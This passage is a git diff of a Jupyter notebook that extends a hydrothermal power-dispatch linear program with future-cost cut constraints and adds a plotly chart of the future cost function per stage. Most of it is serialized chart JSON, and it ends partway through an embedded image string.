+ "solvers.options['glpk'] = dict(msg_lev='GLP_MSG_OFF')\n",
+ "\n",
+ "def dispatch(system, v_i, inflow, cuts, stage, verbose:bool=False):\n",
" n_tgu = len(system.data['thermal-units'])\n",
" n_hgu = len(system.data['hydro-units'])\n",
- "\n",
+ " solvers.options['show_progress'] = verbose\n",
"\n",
" ## Initializing Model Variables\n",
" v_f = model.variable(n_hgu, \"Final Volume of the Hydro Unit\")\n",
@@ -99,6 +113,7 @@
" v_v = model.variable(n_hgu, \"Shed flow of the Hydro Unit\")\n",
" g_t = model.variable(n_tgu, \"Power generated by the Thermal Unit\")\n",
" deficit = model.variable(1, \"Power deficit\")\n",
+ " alpha = model.variable(1, \"Future Cost\")\n",
"\n",
" ## Objective Function\n",
" fob = 0\n",
@@ -107,14 +122,17 @@
" fob+=TestSystem.data['outage_cost']*deficit[0]\n",
" for i, _ in enumerate(system.data['hydro-units']):\n",
" fob += 0.01*v_v[i]\n",
+ " fob += 1.0 * alpha[0]\n",
"\n",
- " ## Hydro Balance\n",
+ " ## Constraints\n",
+ " \n",
+ " ### Hydro Balance\n",
" constraints = []\n",
" for i, hgu in enumerate(system.data['hydro-units']):\n",
- " constraints.append( v_f[i] == v_i + inflow - v_t[i] - v_v[i] )\n",
+ " constraints.append( v_f[i] == float(v_i[i]) + float(inflow[i]) - v_t[i] - v_v[i] )\n",
"\n",
" supplying = 0\n",
- " ## Load Supplying\n",
+ " ### Load Supply\n",
" for i, hgu in enumerate(system.data['hydro-units']):\n",
" supplying += hgu[\"prod\"] * v_t[i]\n",
"\n",
@@ -123,9 +141,10 @@
"\n",
" supplying += deficit[0]\n",
"\n",
- " constraints.append(supplying == system.data['load'][2])\n",
+ " constraints.append(supplying == system.data['load'][stage-2])\n",
+ " \n",
"\n",
- " ## Constraints\n",
+ " ### Bounds\n",
" for i, hgu in enumerate(system.data['hydro-units']):\n",
" constraints.append(v_f[i] >= hgu[\"v_min\"])\n",
" constraints.append(v_f[i] <= hgu[\"v_max\"])\n",
@@ -138,152 +157,1341 @@
" constraints.append(g_t[i] <= tgu[\"capacity\"])\n",
"\n",
" constraints.append(deficit[0] >= 0)\n",
+ " constraints.append(alpha[0] >= 0)\n",
" \n",
+ " ### Cut constraint (Future cost function of forward stage)\n",
+ " for cut in cuts:\n",
+ " if cut['stage'] == stage:\n",
+ " equation = 0\n",
+ " for hgu in range(n_hgu):\n",
+ " equation += float(cut['coefs'][hgu])*v_f[hgu]\n",
+ " equation += float(cut['coef_b'])\n",
+ " constraints.append(alpha[0] >= equation)\n",
+ " \n",
+ " ## Solving\n",
" opt_problem = model.op(objective=fob, constraints=constraints)\n",
" opt_problem.solve(format='dense',solver='glpk')\n",
"\n",
- " print(\"Total Cost: {}\".format(fob.value()))\n",
+ " ## Print\n",
+ " if verbose:\n",
+ " print(\"Total Cost: {}\".format(fob.value()))\n",
"\n",
- " for i, hgu in enumerate(system.data['hydro-units']):\n",
- " print(\"{} {} is {} hm3\".format(v_f.name,i,v_f[i].value()))\n",
- " print(\"{} {} is {} hm3\".format(v_t.name,i,v_t[i].value()))\n",
- " print(\"{} {} is {} hm3\".format(v_v.name,i,v_v[i].value()))\n",
+ " for i, hgu in enumerate(system.data['hydro-units']):\n",
+ " print(\"{} {} is {} hm3\".format(v_f.name,i,v_f[i].value()))\n",
+ " print(\"{} {} is {} hm3\".format(v_t.name,i,v_t[i].value()))\n",
+ " print(\"{} {} is {} hm3\".format(v_v.name,i,v_v[i].value()))\n",
"\n",
- " for i, tgu in enumerate(system.data['thermal-units']):\n",
- " print(\"{} {} is {} MWmed\".format(g_t.name,i,g_t[i].value()))\n",
+ " for i, tgu in enumerate(system.data['thermal-units']):\n",
+ " print(\"{} {} is {} MWmed\".format(g_t.name,i,g_t[i].value()))\n",
"\n",
- " print(\"{} is {} MWmed\".format(deficit.name,deficit[0].value()))\n",
+ " print(\"{} is {} MWmed\".format(deficit.name,deficit[0].value()))\n",
"\n",
- " for i, hgu in enumerate(system.data['hydro-units']):\n",
- " print(\"The cost of water at Hydro Unit {} is {} hm3\".format(i,constraints[i].multiplier.value))\n",
+ " for i, hgu in enumerate(system.data['hydro-units']):\n",
+ " print(\"The cost of water at Hydro Unit {} is {} hm3\".format(i,constraints[i].multiplier.value))\n",
"\n",
- " print(\"The Marginal Cost is: {}\".format(constraints[n_hgu].multiplier.value))"
- ]
- },
- {
- "cell_type": "code",
- "execution_count": 5,
- "id": "17fb0a0c-5a87-41fb-a645-1434a65c02d4",
- "metadata": {},
- "outputs": [
- {
- "name": "stdout",
- "output_type": "stream",
- "text": [
- "Total Cost: [ 7.67e+03]\n",
- "\n",
- "Final Volume of the Hydro Unit 0 is [ 2.00e+01]\n",
- " hm3\n",
- "Turbined Flow of the Hydro Unit 0 is [ 1.10e+01]\n",
- " hm3\n",
- "Shed flow of the Hydro Unit 0 is [ 0.00e+00]\n",
- " hm3\n",
- "Power generated by the Thermal Unit 0 is [ 1.50e+01]\n",
- " MWmed\n",
- "Power generated by the Thermal Unit 1 is [ 1.00e+01]\n",
- " MWmed\n",
- "Power deficit is [ 1.45e+01]\n",
- " MWmed\n",
- "The cost of water at Hydro Unit 0 is [ 4.75e+02]\n",
- " hm3\n",
- "The Marginal Cost is: [-5.00e+02]\n",
- "\n",
- "GLPK Simplex Optimizer, v4.65\n",
- "12 rows, 6 columns, 17 non-zeros\n",
- " 0: obj = 0.000000000e+00 inf = 1.010e+02 (3)\n",
- " 5: obj = 7.675000000e+03 inf = 0.000e+00 (0)\n",
- "* 6: obj = 7.675000000e+03 inf = 0.000e+00 (0)\n",
- "OPTIMAL LP SOLUTION FOUND\n"
- ]
- }
- ],
- "source": [
- "system = TestSystem\n",
- "v_i = 20\n",
- "inflow = 11\n",
+ " print(\"The Marginal Cost is: {}\".format(constraints[n_hgu].multiplier.value))\n",
+ " \n",
+ " return {\n",
+ " \"deficit\": deficit[0].value()[0],\n",
+ " \"operational_marginal_cost\": constraints[n_hgu].multiplier.value[0],\n",
+ " \"total_cost\": fob.value()[0],\n",
+ " \"future_cost\": alpha[0].value()[0],\n",
+ " \"hydro_units\": [{\n",
+ " \"v_f\": v_f[i].value()[0],\n",
+ " \"v_t\": v_t[i].value()[0],\n",
+ " \"v_v\": v_v[i].value()[0],\n",
+ " \"water_marginal_cost\": constraints[i].multiplier.value[0]} for i in range(n_hgu)],\n",
+ " \"thermal_units\": [{\"g_t\": g_t[i].value()[0]} for i in range(n_tgu)]\n",
+ " }\n",
+ "\n",
+ "def plot_future_cost_function(operation: pd.DataFrame):\n",
+ " \n",
+ " n_stages = len(operation['stage'].unique())\n",
+ " \n",
+ " fig = make_subplots(rows=n_stages, cols=1)\n",
+ "\n",
+ " i = 1\n",
+ " for stage in operation['stage'].unique():\n",
+ " stage_df = operation.loc[operation['stage'] == stage] \n",
+ " fig.add_trace(go.Scatter(x=stage_df[\"v_i\"],\n",
+ " y=stage_df['average_cost'],\n",
+ " mode='lines',\n",
+ " name=\"Stage {}\".format(i)), row=stage, col=1)\n",
+ " i+=1\n",
"\n",
- "dispatch(system=system, v_i=v_i, inflow=inflow)"
+ " fig.update_xaxes(title_text=\"Final Volume [hm3]\")\n",
+ " fig.update_yaxes(title_text=\"$/MW\")\n",
+ "\n",
+ " fig.update_layout(height=300*TestSystem.data['stages'], title_text=\"Future Cost Function\")\n",
+ " fig.show()"
]
},
{
"cell_type": "code",
- "execution_count": 9,
- "id": "108fdcb5-9ce2-49db-b487-eeaf90ec0e24",
- "metadata": {},
+ "execution_count": 17,
+ "id": "2b718ada-dd91-4cb6-a31c-f36b61674065",
+ "metadata": {
+ "tags": []
+ },
"outputs": [
{
- "name": "stdout",
- "output_type": "stream",
- "text": [
- "System Load: [50, 50, 50]\n",
- "Number of HGUs: 1\n",
- "Number of TGUs: 2\n"
- ]
+ "data": {
+ "application/vnd.plotly.v1+json": {
+ "config": {
+ "plotlyServerURL": "https://plot.ly"
+ },
+ "data": [
+ {
+ "mode": "lines",
+ "name": "Stage 1",
+ "type": "scatter",
+ "x": [
+ 20,
+ 60,
+ 100
+ ],
+ "xaxis": "x3",
+ "y": [
+ 6725,
+ 7.75,
+ 0
+ ],
+ "yaxis": "y3"
+ },
+ {
+ "mode": "lines",
+ "name": "Stage 2",
+ "type": "scatter",
+ "x": [
+ 20,
+ 60,
+ 100
+ ],
+ "xaxis": "x2",
+ "y": [
+ 11787.5,
+ 226.93,
+ 0.62
+ ],
+ "yaxis": "y2"
+ },
+ {
+ "mode": "lines",
+ "name": "Stage 3",
+ "type": "scatter",
+ "x": [
+ 20,
+ 60,
+ 100
+ ],
+ "xaxis": "x",
+ "y": [
+ 15425,
+ 576.31,
+ 161.68
+ ],
+ "yaxis": "y"
+ }
+ ],
+ "layout": {
+ "autosize": true,
+ "template": {
+ "data": {
+ "bar": [
+ {
+ "error_x": {
+ "color": "#2a3f5f"
+ },
+ "error_y": {
+ "color": "#2a3f5f"
+ },
+ "marker": {
+ "line": {
+ "color": "#E5ECF6",
+ "width": 0.5
+ },
+ "pattern": {
+ "fillmode": "overlay",
+ "size": 10,
+ "solidity": 0.2
+ }
+ },
+ "type": "bar"
+ }
+ ],
+ "barpolar": [
+ {
+ "marker": {
+ "line": {
+ "color": "#E5ECF6",
+ "width": 0.5
+ },
+ "pattern": {
+ "fillmode": "overlay",
+ "size": 10,
+ "solidity": 0.2
+ }
+ },
+ "type": "barpolar"
+ }
+ ],
+ "carpet": [
+ {
+ "aaxis": {
+ "endlinecolor": "#2a3f5f",
+ "gridcolor": "white",
+ "linecolor": "white",
+ "minorgridcolor": "white",
+ "startlinecolor": "#2a3f5f"
+ },
+ "baxis": {
+ "endlinecolor": "#2a3f5f",
+ "gridcolor": "white",
+ "linecolor": "white",
+ "minorgridcolor": "white",
+ "startlinecolor": "#2a3f5f"
+ },
+ "type": "carpet"
+ }
+ ],
+ "choropleth": [
+ {
+ "colorbar": {
+ "outlinewidth": 0,
+ "ticks": ""
+ },
+ "type": "choropleth"
+ }
+ ],
+ "contour": [
+ {
+ "colorbar": {
+ "outlinewidth": 0,
+ "ticks": ""
+ },
+ "colorscale": [
+ [
+ 0,
+ "#0d0887"
+ ],
+ [
+ 0.1111111111111111,
+ "#46039f"
+ ],
+ [
+ 0.2222222222222222,
+ "#7201a8"
+ ],
+ [
+ 0.3333333333333333,
+ "#9c179e"
+ ],
+ [
+ 0.4444444444444444,
+ "#bd3786"
+ ],
+ [
+ 0.5555555555555556,
+ "#d8576b"
+ ],
+ [
+ 0.6666666666666666,
+ "#ed7953"
+ ],
+ [
+ 0.7777777777777778,
+ "#fb9f3a"
+ ],
+ [
+ 0.8888888888888888,
+ "#fdca26"
+ ],
+ [
+ 1,
+ "#f0f921"
+ ]
+ ],
+ "type": "contour"
+ }
+ ],
+ "contourcarpet": [
+ {
+ "colorbar": {
+ "outlinewidth": 0,
+ "ticks": ""
+ },
+ "type": "contourcarpet"
+ }
+ ],
+ "heatmap": [
+ {
+ "colorbar": {
+ "outlinewidth": 0,
+ "ticks": ""
+ },
+ "colorscale": [
+ [
+ 0,
+ "#0d0887"
+ ],
+ [
+ 0.1111111111111111,
+ "#46039f"
+ ],
+ [
+ 0.2222222222222222,
+ "#7201a8"
+ ],
+ [
+ 0.3333333333333333,
+ "#9c179e"
+ ],
+ [
+ 0.4444444444444444,
+ "#bd3786"
+ ],
+ [
+ 0.5555555555555556,
+ "#d8576b"
+ ],
+ [
+ 0.6666666666666666,
+ "#ed7953"
+ ],
+ [
+ 0.7777777777777778,
+ "#fb9f3a"
+ ],
+ [
+ 0.8888888888888888,
+ "#fdca26"
+ ],
+ [
+ 1,
+ "#f0f921"
+ ]
+ ],
+ "type": "heatmap"
+ }
+ ],
+ "heatmapgl": [
+ {
+ "colorbar": {
+ "outlinewidth": 0,
+ "ticks": ""
+ },
+ "colorscale": [
+ [
+ 0,
+ "#0d0887"
+ ],
+ [
+ 0.1111111111111111,
+ "#46039f"
+ ],
+ [
+ 0.2222222222222222,
+ "#7201a8"
+ ],
+ [
+ 0.3333333333333333,
+ "#9c179e"
+ ],
+ [
+ 0.4444444444444444,
+ "#bd3786"
+ ],
+ [
+ 0.5555555555555556,
+ "#d8576b"
+ ],
+ [
+ 0.6666666666666666,
+ "#ed7953"
+ ],
+ [
+ 0.7777777777777778,
+ "#fb9f3a"
+ ],
+ [
+ 0.8888888888888888,
+ "#fdca26"
+ ],
+ [
+ 1,
+ "#f0f921"
+ ]
+ ],
+ "type": "heatmapgl"
+ }
+ ],
+ "histogram": [
+ {
+ "marker": {
+ "pattern": {
+ "fillmode": "overlay",
+ "size": 10,
+ "solidity": 0.2
+ }
+ },
+ "type": "histogram"
+ }
+ ],
+ "histogram2d": [
+ {
+ "colorbar": {
+ "outlinewidth": 0,
+ "ticks": ""
+ },
+ "colorscale": [
+ [
+ 0,
+ "#0d0887"
+ ],
+ [
+ 0.1111111111111111,
+ "#46039f"
+ ],
+ [
+ 0.2222222222222222,
+ "#7201a8"
+ ],
+ [
+ 0.3333333333333333,
+ "#9c179e"
+ ],
+ [
+ 0.4444444444444444,
+ "#bd3786"
+ ],
+ [
+ 0.5555555555555556,
+ "#d8576b"
+ ],
+ [
+ 0.6666666666666666,
+ "#ed7953"
+ ],
+ [
+ 0.7777777777777778,
+ "#fb9f3a"
+ ],
+ [
+ 0.8888888888888888,
+ "#fdca26"
+ ],
+ [
+ 1,
+ "#f0f921"
+ ]
+ ],
+ "type": "histogram2d"
+ }
+ ],
+ "histogram2dcontour": [
+ {
+ "colorbar": {
+ "outlinewidth": 0,
+ "ticks": ""
+ },
+ "colorscale": [
+ [
+ 0,
+ "#0d0887"
+ ],
+ [
+ 0.1111111111111111,
+ "#46039f"
+ ],
+ [
+ 0.2222222222222222,
+ "#7201a8"
+ ],
+ [
+ 0.3333333333333333,
+ "#9c179e"
+ ],
+ [
+ 0.4444444444444444,
+ "#bd3786"
+ ],
+ [
+ 0.5555555555555556,
+ "#d8576b"
+ ],
+ [
+ 0.6666666666666666,
+ "#ed7953"
+ ],
+ [
+ 0.7777777777777778,
+ "#fb9f3a"
+ ],
+ [
+ 0.8888888888888888,
+ "#fdca26"
+ ],
+ [
+ 1,
+ "#f0f921"
+ ]
+ ],
+ "type": "histogram2dcontour"
+ }
+ ],
+ "mesh3d": [
+ {
+ "colorbar": {
+ "outlinewidth": 0,
+ "ticks": ""
+ },
+ "type": "mesh3d"
+ }
+ ],
+ "parcoords": [
+ {
+ "line": {
+ "colorbar": {
+ "outlinewidth": 0,
+ "ticks": ""
+ }
+ },
+ "type": "parcoords"
+ }
+ ],
+ "pie": [
+ {
+ "automargin": true,
+ "type": "pie"
+ }
+ ],
+ "scatter": [
+ {
+ "marker": {
+ "colorbar": {
+ "outlinewidth": 0,
+ "ticks": ""
+ }
+ },
+ "type": "scatter"
+ }
+ ],
+ "scatter3d": [
+ {
+ "line": {
+ "colorbar": {
+ "outlinewidth": 0,
+ "ticks": ""
+ }
+ },
+ "marker": {
+ "colorbar": {
+ "outlinewidth": 0,
+ "ticks": ""
+ }
+ },
+ "type": "scatter3d"
+ }
+ ],
+ "scattercarpet": [
+ {
+ "marker": {
+ "colorbar": {
+ "outlinewidth": 0,
+ "ticks": ""
+ }
+ },
+ "type": "scattercarpet"
+ }
+ ],
+ "scattergeo": [
+ {
+ "marker": {
+ "colorbar": {
+ "outlinewidth": 0,
+ "ticks": ""
+ }
+ },
+ "type": "scattergeo"
+ }
+ ],
+ "scattergl": [
+ {
+ "marker": {
+ "colorbar": {
+ "outlinewidth": 0,
+ "ticks": ""
+ }
+ },
+ "type": "scattergl"
+ }
+ ],
+ "scattermapbox": [
+ {
+ "marker": {
+ "colorbar": {
+ "outlinewidth": 0,
+ "ticks": ""
+ }
+ },
+ "type": "scattermapbox"
+ }
+ ],
+ "scatterpolar": [
+ {
+ "marker": {
+ "colorbar": {
+ "outlinewidth": 0,
+ "ticks": ""
+ }
+ },
+ "type": "scatterpolar"
+ }
+ ],
+ "scatterpolargl": [
+ {
+ "marker": {
+ "colorbar": {
+ "outlinewidth": 0,
+ "ticks": ""
+ }
+ },
+ "type": "scatterpolargl"
+ }
+ ],
+ "scatterternary": [
+ {
+ "marker": {
+ "colorbar": {
+ "outlinewidth": 0,
+ "ticks": ""
+ }
+ },
+ "type": "scatterternary"
+ }
+ ],
+ "surface": [
+ {
+ "colorbar": {
+ "outlinewidth": 0,
+ "ticks": ""
+ },
+ "colorscale": [
+ [
+ 0,
+ "#0d0887"
+ ],
+ [
+ 0.1111111111111111,
+ "#46039f"
+ ],
+ [
+ 0.2222222222222222,
+ "#7201a8"
+ ],
+ [
+ 0.3333333333333333,
+ "#9c179e"
+ ],
+ [
+ 0.4444444444444444,
+ "#bd3786"
+ ],
+ [
+ 0.5555555555555556,
+ "#d8576b"
+ ],
+ [
+ 0.6666666666666666,
+ "#ed7953"
+ ],
+ [
+ 0.7777777777777778,
+ "#fb9f3a"
+ ],
+ [
+ 0.8888888888888888,
+ "#fdca26"
+ ],
+ [
+ 1,
+ "#f0f921"
+ ]
+ ],
+ "type": "surface"
+ }
+ ],
+ "table": [
+ {
+ "cells": {
+ "fill": {
+ "color": "#EBF0F8"
+ },
+ "line": {
+ "color": "white"
+ }
+ },
+ "header": {
+ "fill": {
+ "color": "#C8D4E3"
+ },
+ "line": {
+ "color": "white"
+ }
+ },
+ "type": "table"
+ }
+ ]
+ },
+ "layout": {
+ "annotationdefaults": {
+ "arrowcolor": "#2a3f5f",
+ "arrowhead": 0,
+ "arrowwidth": 1
+ },
+ "autotypenumbers": "strict",
+ "coloraxis": {
+ "colorbar": {
+ "outlinewidth": 0,
+ "ticks": ""
+ }
+ },
+ "colorscale": {
+ "diverging": [
+ [
+ 0,
+ "#8e0152"
+ ],
+ [
+ 0.1,
+ "#c51b7d"
+ ],
+ [
+ 0.2,
+ "#de77ae"
+ ],
+ [
+ 0.3,
+ "#f1b6da"
+ ],
+ [
+ 0.4,
+ "#fde0ef"
+ ],
+ [
+ 0.5,
+ "#f7f7f7"
+ ],
+ [
+ 0.6,
+ "#e6f5d0"
+ ],
+ [
+ 0.7,
+ "#b8e186"
+ ],
+ [
+ 0.8,
+ "#7fbc41"
+ ],
+ [
+ 0.9,
+ "#4d9221"
+ ],
+ [
+ 1,
+ "#276419"
+ ]
+ ],
+ "sequential": [
+ [
+ 0,
+ "#0d0887"
+ ],
+ [
+ 0.1111111111111111,
+ "#46039f"
+ ],
+ [
+ 0.2222222222222222,
+ "#7201a8"
+ ],
+ [
+ 0.3333333333333333,
+ "#9c179e"
+ ],
+ [
+ 0.4444444444444444,
+ "#bd3786"
+ ],
+ [
+ 0.5555555555555556,
+ "#d8576b"
+ ],
+ [
+ 0.6666666666666666,
+ "#ed7953"
+ ],
+ [
+ 0.7777777777777778,
+ "#fb9f3a"
+ ],
+ [
+ 0.8888888888888888,
+ "#fdca26"
+ ],
+ [
+ 1,
+ "#f0f921"
+ ]
+ ],
+ "sequentialminus": [
+ [
+ 0,
+ "#0d0887"
+ ],
+ [
+ 0.1111111111111111,
+ "#46039f"
+ ],
+ [
+ 0.2222222222222222,
+ "#7201a8"
+ ],
+ [
+ 0.3333333333333333,
+ "#9c179e"
+ ],
+ [
+ 0.4444444444444444,
+ "#bd3786"
+ ],
+ [
+ 0.5555555555555556,
+ "#d8576b"
+ ],
+ [
+ 0.6666666666666666,
+ "#ed7953"
+ ],
+ [
+ 0.7777777777777778,
+ "#fb9f3a"
+ ],
+ [
+ 0.8888888888888888,
+ "#fdca26"
+ ],
+ [
+ 1,
+ "#f0f921"
+ ]
+ ]
+ },
+ "colorway": [
+ "#636efa",
+ "#EF553B",
+ "#00cc96",
+ "#ab63fa",
+ "#FFA15A",
+ "#19d3f3",
+ "#FF6692",
+ "#B6E880",
+ "#FF97FF",
+ "#FECB52"
+ ],
+ "font": {
+ "color": "#2a3f5f"
+ },
+ "geo": {
+ "bgcolor": "white",
+ "lakecolor": "white",
+ "landcolor": "#E5ECF6",
+ "showlakes": true,
+ "showland": true,
+ "subunitcolor": "white"
+ },
+ "hoverlabel": {
+ "align": "left"
+ },
+ "hovermode": "closest",
+ "mapbox": {
+ "style": "light"
+ },
+ "paper_bgcolor": "white",
+ "plot_bgcolor": "#E5ECF6",
+ "polar": {
+ "angularaxis": {
+ "gridcolor": "white",
+ "linecolor": "white",
+ "ticks": ""
+ },
+ "bgcolor": "#E5ECF6",
+ "radialaxis": {
+ "gridcolor": "white",
+ "linecolor": "white",
+ "ticks": ""
+ }
+ },
+ "scene": {
+ "xaxis": {
+ "backgroundcolor": "#E5ECF6",
+ "gridcolor": "white",
+ "gridwidth": 2,
+ "linecolor": "white",
+ "showbackground": true,
+ "ticks": "",
+ "zerolinecolor": "white"
+ },
+ "yaxis": {
+ "backgroundcolor": "#E5ECF6",
+ "gridcolor": "white",
+ "gridwidth": 2,
+ "linecolor": "white",
+ "showbackground": true,
+ "ticks": "",
+ "zerolinecolor": "white"
+ },
+ "zaxis": {
+ "backgroundcolor": "#E5ECF6",
+ "gridcolor": "white",
+ "gridwidth": 2,
+ "linecolor": "white",
+ "showbackground": true,
+ "ticks": "",
+ "zerolinecolor": "white"
+ }
+ },
+ "shapedefaults": {
+ "line": {
+ "color": "#2a3f5f"
+ }
+ },
+ "ternary": {
+ "aaxis": {
+ "gridcolor": "white",
+ "linecolor": "white",
+ "ticks": ""
+ },
+ "baxis": {
+ "gridcolor": "white",
+ "linecolor": "white",
+ "ticks": ""
+ },
+ "bgcolor": "#E5ECF6",
+ "caxis": {
+ "gridcolor": "white",
+ "linecolor": "white",
+ "ticks": ""
+ }
+ },
+ "title": {
+ "x": 0.05
+ },
+ "xaxis": {
+ "automargin": true,
+ "gridcolor": "white",
+ "linecolor": "white",
+ "ticks": "",
+ "title": {
+ "standoff": 15
+ },
+ "zerolinecolor": "white",
+ "zerolinewidth": 2
+ },
+ "yaxis": {
+ "automargin": true,
+ "gridcolor": "white",
+ "linecolor": "white",
+ "ticks": "",
+ "title": {
+ "standoff": 15
+ },
+ "zerolinecolor": "white",
+ "zerolinewidth": 2
+ }
+ }
+ },
+ "title": {
+ "text": "Future Cost Function"
+ },
+ "xaxis": {
+ "anchor": "y",
+ "autorange": true,
+ "domain": [
+ 0,
+ 1
+ ],
+ "range": [
+ 20,
+ 100
+ ],
+ "title": {
+ "text": "Final Volume [hm3]"
+ },
+ "type": "linear"
+ },
+ "xaxis2": {
+ "anchor": "y2",
+ "autorange": true,
+ "domain": [
+ 0,
+ 1
+ ],
+ "range": [
+ 20,
+ 100
+ ],
+ "title": {
+ "text": "Final Volume [hm3]"
+ },
+ "type": "linear"
+ },
+ "xaxis3": {
+ "anchor": "y3",
+ "autorange": true,
+ "domain": [
+ 0,
+ 1
+ ],
+ "range": [
+ 20,
+ 100
+ ],
+ "title": {
+ "text": "Final Volume [hm3]"
+ },
+ "type": "linear"
+ },
+ "yaxis": {
+ "anchor": "x",
+ "autorange": true,
+ "domain": [
+ 0.7333333333333333,
+ 1
+ ],
+ "range": [
+ -686.2822222222221,
+ 16272.962222222222
+ ],
+ "title": {
+ "text": "$/MW"
+ },
+ "type": "linear"
+ },
+ "yaxis2": {
+ "anchor": "x2",
+ "autorange": true,
+ "domain": [
+ 0.36666666666666664,
+ 0.6333333333333333
+ ],
+ "range": [
+ -654.2066666666667,
+ 12442.326666666666
+ ],
+ "title": {
+ "text": "$/MW"
+ },
+ "type": "linear"
+ },
+ "yaxis3": {
+ "anchor": "x3",
+ "autorange": true,
+ "domain": [
+ 0,
+ 0.26666666666666666
+ ],
+ "range": [
+ -373.61111111111114,
+ 7098.611111111111
+ ],
+ "title": {
+ "text": "$/MW"
+ },
+ "type": "linear"
+ }
+ }
+ },
+ "image/png": "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